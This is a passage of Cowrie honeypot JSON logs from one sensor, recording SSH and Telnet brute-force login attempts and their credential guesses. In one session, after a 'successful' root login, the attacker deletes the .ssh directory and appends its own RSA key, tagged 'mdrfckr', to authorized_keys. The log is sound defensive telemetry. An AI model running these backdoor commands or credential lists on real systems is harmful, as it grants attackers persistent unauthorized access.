.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:43:32.903292Z","src_ip":"212.227.235.229","session":"5887572c9ac0"}
{"eventid":"cowrie.login.failed","username":"desliga","password":"desliga","message":"login attempt [desliga/desliga] failed","sensor":"my-vps","timestamp":"2025-09-09T06:43:33.914537Z","src_ip":"212.227.235.229","session":"5887572c9ac0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:43:35.159003Z","src_ip":"212.227.235.229","session":"5887572c9ac0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49494,"dst_ip":"1.2.3.4","dst_port":22,"session":"46391e24113b","protocol":"ssh","message":"New connection: 212.227.235.229:49494 (1.2.3.4:22) [session: 46391e24113b]","sensor":"my-vps","timestamp":"2025-09-09T06:43:36.826396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:43:36.827241Z","src_ip":"212.227.235.229","session":"46391e24113b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:43:36.946282Z","src_ip":"212.227.235.229","session":"46391e24113b"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:43:37.137006Z","src_ip":"212.227.235.229","session":"c4e683b2a128"}
{"eventid":"cowrie.login.failed","username":"white","password":"white2025","message":"login attempt [white/white2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:43:37.410577Z","src_ip":"212.227.235.229","session":"46391e24113b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:43:38.528689Z","src_ip":"212.227.235.229","session":"46391e24113b"}
{"eventid":"cowrie.session.connect","src_ip":"201.108.95.15","src_port":54912,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ee7a1ba9711","protocol":"telnet","message":"New connection: 201.108.95.15:54912 (1.2.3.4:23) [session: 7ee7a1ba9711]","sensor":"my-vps","timestamp":"2025-09-09T06:43:59.900773Z"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":34690,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f57bf297a47","protocol":"ssh","message":"New connection: 118.26.39.178:34690 (1.2.3.4:22) [session: 3f57bf297a47]","sensor":"my-vps","timestamp":"2025-09-09T06:44:12.033431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:44:12.034250Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:44:12.291301Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome@12345","message":"login attempt [root/Welcome@12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:44:13.362924Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:44:13.935553Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:44:13.936253Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:44:13.937474Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:44:14.205816Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:44:14.741722Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:44:14.742510Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:44:15.004185Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:44:15.005085Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":34694,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e83c4c72f59","protocol":"ssh","message":"New connection: 118.26.39.178:34694 (1.2.3.4:22) [session: 0e83c4c72f59]","sensor":"my-vps","timestamp":"2025-09-09T06:44:15.145234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:44:15.146393Z","src_ip":"118.26.39.178","session":"0e83c4c72f59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:44:17.955116Z","src_ip":"118.26.39.178","session":"0e83c4c72f59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38397,"dst_ip":"1.2.3.4","dst_port":22,"session":"f40ab87bce78","protocol":"ssh","message":"New connection: 212.227.235.229:38397 (1.2.3.4:22) [session: f40ab87bce78]","sensor":"my-vps","timestamp":"2025-09-09T06:44:18.197304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:44:18.198724Z","src_ip":"212.227.235.229","session":"f40ab87bce78"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:44:18.265769Z","src_ip":"212.227.235.229","session":"f40ab87bce78"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:44:18.552865Z","src_ip":"118.26.39.178","session":"0e83c4c72f59"}
{"eventid":"cowrie.login.failed","username":"username","password":"123","message":"login attempt [username/123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:44:18.567359Z","src_ip":"212.227.235.229","session":"f40ab87bce78"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:44:19.633357Z","src_ip":"212.227.235.229","session":"f40ab87bce78"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:44:19.755403Z","src_ip":"118.26.39.178","session":"0e83c4c72f59"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":32978,"dst_ip":"1.2.3.4","dst_port":22,"session":"a321e20631af","protocol":"ssh","message":"New connection: 118.26.39.178:32978 (1.2.3.4:22) [session: a321e20631af]","sensor":"my-vps","timestamp":"2025-09-09T06:44:20.066389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:44:20.067868Z","src_ip":"118.26.39.178","session":"a321e20631af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:44:20.322884Z","src_ip":"118.26.39.178","session":"a321e20631af"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:44:21.388069Z","src_ip":"118.26.39.178","session":"a321e20631af"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:44:21.649447Z","src_ip":"118.26.39.178","session":"3f57bf297a47"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:44:21.650534Z","src_ip":"118.26.39.178","session":"a321e20631af"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":44126,"dst_ip":"1.2.3.4","dst_port":22,"session":"69b30534981f","protocol":"ssh","message":"New connection: 157.20.207.165:44126 (1.2.3.4:22) [session: 69b30534981f]","sensor":"my-vps","timestamp":"2025-09-09T06:44:33.739494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:44:33.740581Z","src_ip":"157.20.207.165","session":"69b30534981f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:44:34.477331Z","src_ip":"157.20.207.165","session":"69b30534981f"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password","message":"login attempt [mysql/password] failed","sensor":"my-vps","timestamp":"2025-09-09T06:44:35.252675Z","src_ip":"157.20.207.165","session":"69b30534981f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:44:36.437945Z","src_ip":"157.20.207.165","session":"69b30534981f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65172,"dst_ip":"1.2.3.4","dst_port":22,"session":"44a640e52859","protocol":"ssh","message":"New connection: 212.227.235.229:65172 (1.2.3.4:22) [session: 44a640e52859]","sensor":"my-vps","timestamp":"2025-09-09T06:44:38.419651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:44:38.420549Z","src_ip":"212.227.235.229","session":"44a640e52859"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:44:38.538610Z","src_ip":"212.227.235.229","session":"44a640e52859"}
{"eventid":"cowrie.login.failed","username":"ghost","password":"123","message":"login attempt [ghost/123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:44:39.036636Z","src_ip":"212.227.235.229","session":"44a640e52859"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:44:40.154567Z","src_ip":"212.227.235.229","session":"44a640e52859"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40308,"dst_ip":"1.2.3.4","dst_port":22,"session":"993527db030a","protocol":"ssh","message":"New connection: 212.227.235.229:40308 (1.2.3.4:22) [session: 993527db030a]","sensor":"my-vps","timestamp":"2025-09-09T06:44:44.391876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:44:44.392672Z","src_ip":"212.227.235.229","session":"993527db030a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:44:44.634816Z","src_ip":"212.227.235.229","session":"993527db030a"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"password123","message":"login attempt [db1inst1/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:44:45.642048Z","src_ip":"212.227.235.229","session":"993527db030a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:44:46.886263Z","src_ip":"212.227.235.229","session":"993527db030a"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":57156,"dst_ip":"1.2.3.4","dst_port":22,"session":"c11e3639ec44","protocol":"ssh","message":"New connection: 118.26.39.178:57156 (1.2.3.4:22) [session: c11e3639ec44]","sensor":"my-vps","timestamp":"2025-09-09T06:45:28.620280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:45:28.621032Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
